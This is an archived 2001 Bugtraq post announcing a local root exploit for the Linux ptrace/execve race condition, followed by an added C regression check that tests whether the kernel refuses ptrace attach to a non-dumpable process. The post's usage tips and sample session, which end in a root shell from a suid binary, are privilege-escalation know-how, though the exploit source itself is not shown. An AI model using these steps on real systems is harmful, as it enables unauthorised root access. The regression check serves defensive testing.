The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix

ptrace/execve race condition exploit (non brute-force)
Date: Tue, 27 Mar 2001 14:05:54 +0200
From: Wojciech Purczynski <wp@ELZABSOFT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ptrace/execve race condition exploit (non brute-force)

Hi,

Here is an exploit for the ptrace/execve race condition bug in Linux kernels up
to 2.2.18.

It works even on openwall-patched kernels (including the broken fix in 2.2.18ow4)
if you use the address of the BSS section in memory (use objdump -h /suid/binary
to get the .bss section address).

It does not use brute force! It makes only one attempt; the parent process detects
the exact moment of the context switch after the child goes to sleep in execve.

If you have some problems, ensure that the suid binary you want to sploit does
not exist in the disk cache.

For more info, read the comments in the source code.

It has been broken in two places.

Sample output:

[wp@wp /tmp]$ uname -a
Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
[wp@wp /tmp]$ objdump -h /bin/su | grep .bss
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2
[wp@wp /tmp]$ find / >dev/null 2>&1
[wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04
Bug exploited successfully.
sh-2.03#

It works with any suid binary.

Cheers,
wp

+---------------------------------------------------------+
| Wojciech Purczyński                 Linux Administrator |
| wp@elzabsoft.pl             http://www.elzabsoft.pl/~wp |
| +48604432981        http://www.elzabsoft.pl/~wp/gpg.asc |
+---------------------------------------------------------+

[Attachment: epcs.c]
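The bug described in this post is that an unprivileged parent could attach with ptrace to its child while the child was in the middle of a setuid execve. Later kernels close this class of problem by marking a process that has gone through a setuid exec as non-dumpable, and refusing PTRACE_ATTACH from a same-uid tracer that lacks CAP_SYS_PTRACE (the call fails with EPERM). The C program below is an added regression check and is not part of the original post or of the epcs.c attachment: the child marks itself non-dumpable with prctl(PR_SET_DUMPABLE, 0) as a stand-in for a setuid exec (no setuid binary is needed), and the parent tries to attach. The function name check_ptrace_nondumpable and the CHECK_* result codes are this example's own.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Result codes (names chosen for this example). */
enum ptrace_check_result {
    CHECK_BLOCKED = 0,      /* attach refused with EPERM: the expected, hardened behaviour */
    CHECK_ALLOWED = 1,      /* unprivileged attach to a non-dumpable child succeeded: investigate */
    CHECK_INCONCLUSIVE = 2  /* tracer is privileged, or the check could not be carried out */
};

/* Fork a child, make it non-dumpable (the state a process is left in after a
 * setuid execve), then try to PTRACE_ATTACH to it from the parent. */
enum ptrace_check_result check_ptrace_nondumpable(void)
{
    int pipefd[2];
    if (pipe(pipefd) != 0)
        return CHECK_INCONCLUSIVE;

    pid_t pid = fork();
    if (pid < 0)
        return CHECK_INCONCLUSIVE;

    if (pid == 0) {
        /* Child: drop the dumpable flag, tell the parent we are ready, sleep. */
        close(pipefd[0]);
        if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
            _exit(2);
        char ready = 'r';
        if (write(pipefd[1], &ready, 1) != 1)
            _exit(2);
        close(pipefd[1]);
        pause();            /* wait until the parent kills us */
        _exit(0);
    }

    /* Parent: block until the child reports that dumpable is now 0. */
    close(pipefd[1]);
    char buf;
    ssize_t n = read(pipefd[0], &buf, 1);
    close(pipefd[0]);
    if (n != 1) {
        kill(pid, SIGKILL);
        waitpid(pid, NULL, 0);
        return CHECK_INCONCLUSIVE;
    }

    enum ptrace_check_result result;
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == 0) {
        /* A tracer holding CAP_SYS_PTRACE (normally root) may attach to a
         * non-dumpable task, so only an unprivileged success is a finding. */
        result = (geteuid() == 0) ? CHECK_INCONCLUSIVE : CHECK_ALLOWED;
        waitpid(pid, NULL, 0);                 /* consume the attach SIGSTOP */
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
    } else if (errno == EPERM) {
        result = CHECK_BLOCKED;
    } else {
        result = CHECK_INCONCLUSIVE;           /* e.g. ptrace filtered by seccomp */
    }

    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return result;
}

int main(void)
{
    static const char *names[] = { "blocked (expected)", "ALLOWED", "inconclusive" };
    enum ptrace_check_result r = check_ptrace_nondumpable();
    printf("ptrace attach to non-dumpable child: %s\n", names[r]);
    return r == CHECK_ALLOWED ? 1 : 0;
}
```

Run it as an ordinary user, not as root: root holds CAP_SYS_PTRACE and the attach is legitimately permitted, which the program reports as inconclusive rather than as a finding. The same kernel check (ptrace_may_access) is what stops a tracer from following a setuid execve on current kernels, so a CHECK_BLOCKED result is the behaviour a hardened system should show.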

Created 1996-2003 by Maxim Chirkov  